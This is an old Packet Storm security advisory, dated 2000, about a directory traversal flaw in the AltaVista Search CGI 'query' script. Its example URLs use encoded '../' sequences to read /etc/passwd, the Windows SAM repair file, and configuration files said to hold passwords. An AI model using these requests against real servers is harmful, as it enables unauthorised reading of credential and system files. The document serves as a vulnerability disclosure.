altavista.txt

2000-01-12T00:00:00
ID PACKETSTORM:10888
Type packetstorm
Reporter RC
Modified 2000-01-12T00:00:00

Description

                                        
                                            `hola,  
  
more bugs in the AV-Search thing ..  
  
using uri-encoded strings it is possible to view "any" file on the system ..  
  
examples:  
  
unixxxsss ...  
  
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd  
  
or on an micro$oft IIS ...  
  
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._  
  
interesting infos about the file structure ...  
  
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.log  
  
or another file which does contain the password ..  
  
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf  
  
altavista told me that this is(was) just a flavour of the "old" bug and its  
fix is(was) included in the last secpatch.  
  
whatever ....  
  
nicedays :-/  
  
RC  
rudicarell@hotmail.com  
  
  
`